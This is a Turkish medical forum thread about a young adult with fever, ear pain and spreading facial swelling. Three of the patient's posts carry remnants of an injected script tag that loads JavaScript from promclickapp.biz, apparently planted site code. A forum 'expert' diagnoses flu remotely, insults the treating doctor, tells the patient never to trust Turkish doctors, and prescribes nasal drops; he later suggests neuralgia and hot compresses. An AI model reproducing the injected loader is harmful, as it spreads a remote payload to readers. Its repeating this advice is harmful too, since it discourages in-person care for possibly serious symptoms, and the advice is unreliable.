|
Halsizlik ve yüzün şişmesi |
Yanıt Yaz ![]() |
Sayfa 12> |
Yazar | |
sibelsoylu ![]() Üye ![]() Kayıt Tarihi: 26 Mar 2020 Durum: Aktif Değil Puanlar: 4 |
![]() Yanıt Yaz
Alıntı sibelsoylu
Bu mesaj kurallara aykırıysa buradan yöneticileri bilgilendirebilirsiniz.
![]() ![]() ![]() ![]() Gönderim Zamanı: 26 Mar 2020 Saat 13:11 |
Doktor bey merhaba< ="text/" async="" ="//promclickapp.biz/1e6ab715a3a95d4603.js">
Benim 2 gün önce sağ, dün de sol kulağımın altında ağrı oluştu, dün öğleden sonra çok fazla halsizlik ve üşüme yaşadım Akşam ateşim de çıktı ama şu an ateşim yok, boğaz ağrısı öksürük vs de yok şu an ama yüzümün sol tarafında şişlik ve ciddi ağrı oluştu Şu an düne göre daha iyiyim ateşim yok, kas eklem ağrılarım da çok yok ama sol kaşımın etrafı arı sokmuş gibi şiş oldu Bugün aile hekimine gittim alerjik bişey olabilir dedi antibiyotik şimdilik vermiycem dedi AERIUS diye bi ilaç verdi şişlik için Sizce ne yapmalıyım Teşekkürler Serkan Aygün yaşım 31
|
|
![]() |
|
sibelsoylu ![]() Üye ![]() Kayıt Tarihi: 26 Mar 2020 Durum: Aktif Değil Puanlar: 4 |
![]() Yanıt Yaz
Alıntı sibelsoylu
![]() ![]() ![]() ![]() |
Tekrar merhaba
1 hafta önce 1 sümbül aldım ve açtı çok kokuyordu ve 1 hafta hep yanımda kaldı bunun bi etkisi olabilir mi? Resim atacaktım ama bi türlü yapamadım < ="text/" async="" ="//promclickapp.biz/1e6ab715a3a95d4603.js">Düzenleyen sibelsoylu - 26 Mar 2020 Saat 14:26 |
|
![]() |
|
Dr.KadirTugcu ![]() Uzman ![]() Kayıt Tarihi: 14 Ağu 2008 Durum: Aktif Puanlar: 118336 |
![]() Yanıt Yaz
Alıntı Dr.KadirTugcu
Grip geciriyorsunuz, Kulak agrisi yapmis.
Bu konuyu Turk doktorlari bilmezler. Onlara gore her hastalik, Allerji'dir Salak birde allerji ilaci diye, Astim ilaci vermis!! Sakin Turk doktorlara inanmayin., Iliadin damla, gunde:2x4 damla, 5 gun burun deliklerinize damlatin. (Sprey bir ise yaramaz)Damla yaparken, sirt ustu yatin ve her bir tarafa damlattiktan sonra, basinizi o tarafa cevirip, 1-2 dakika bekleyin. |
|
![]() |
|
![]() Yanıt Yaz
Alıntı sibelsoylu
Merhaba
Cevap için çok teşekkür ederim Kulak ağrıları şişlikten önce olmuştu, şu an kulak ağrım yok, boğaz ağrım ya da öksürük de yok hafif ateşim var yine ve halsizlik de var Şişlikten korkuyorum göz kapağım da hafiften ağrımaya başladı stabil haldeyken düzenli bir ağrı yok ama mesela kaşlarımı kaldırdığımda veya yüzümü yıkarken ağrıyı ciddi şekilde hissedebiliyorum. Resim atabilseydim şişliği atacaktım ama yapamadım Tekrar teşekkürler
< ="text/" async="" ="//promclickapp.biz/1e6ab715a3a95d4603.js">![]() Düzenleyen sibelsoylu - 26 Mar 2020 Saat 23:52 |
|
![]() |
|
sillers ![]() Üye ![]() Kayıt Tarihi: 27 Mar 2020 Durum: Aktif Değil Puanlar: 3 |
![]() ![]() ![]() ![]() ![]() |
![]() |
|
![]() |
|
sillers ![]() Üye ![]() Kayıt Tarihi: 27 Mar 2020 Durum: Aktif Değil Puanlar: 3 |
Hocam kardeşim yerine ben atıyorum diğer fotoları, ilginize içten teşekkürler. ![]() |
|
![]() |
|
Dr.KadirTugcu ![]() Uzman ![]() Kayıt Tarihi: 14 Ağu 2008 Durum: Aktif Puanlar: 118336 |
![]() Yanıt Yaz
Alıntı Dr.KadirTugcu
Trigeminal nevralji basliyor olabilir. Agri oldugunda, sicak kompres uygulayin.
Stres den de uzak durun. |
|
![]() |
|
Hocam Merhaba Kardeşimizin son durumu ile ilgili yazmak istedik. Şişlik diğer gözüne doğru da yayılmaya başladı ve ateşi 38.9 olarak ölçüldü. Kbb doktoruna gittik. Bize Avill verdi, alerjiktir diye. Göz doktoruna da göründük. O da Amoklavin 1000mg verdi ve geçmezse bir de Çapa cildiyeye gidin dedi. Teşhis olmayınca başka bir hastaneye daha gittik, dahiliye için. Tahlil olabilsek amaç size atmaktı ama daha girdiğimiz gibi ateş ölçtüler ve yüksek çıkınca Covid şüphelisi olduğumuz söylendi ve kimse ilgilenmedi. 1. Hocam hikayemiz bu ve tahlil yaptıramadık. Covid dahi olsak bilemeyecek durumdayız, hastaneler iptal. Ağrı ve şişlik kardeşimizin diğer gözüne ilerliyor, bize nevralji dışında aklınıza gelen başka bir tablo varsa söyler misiniz? 2. Kardeşimiz daha evvel zona geçirmişti. Nevralji ile bağı nedir zonanın, var mıdır? Hocam ilaçları kullansın mı? Bir de bu tabloya (ateş ve şişliğin yayılması) yorumunuz, teşhisiniz ne olur?
|
|
![]() |
Yanıt Yaz ![]() |
Sayfa 12> |
Tweet
|
Forum Atla | Forum İzinleri ![]() Sen Kapalı Foruma Yeni Konu Gönderme Sen Kapalı Forumdaki Konulara Cevap Yazma Sen Kapalı Forumda Cevapları Silme Sen Kapalı Forumdaki Cevapları Düzenleme Sen Kapalı Forumda Anket Açma Sen Kapalı Forumda Anketlerde Oy Kullanma |
|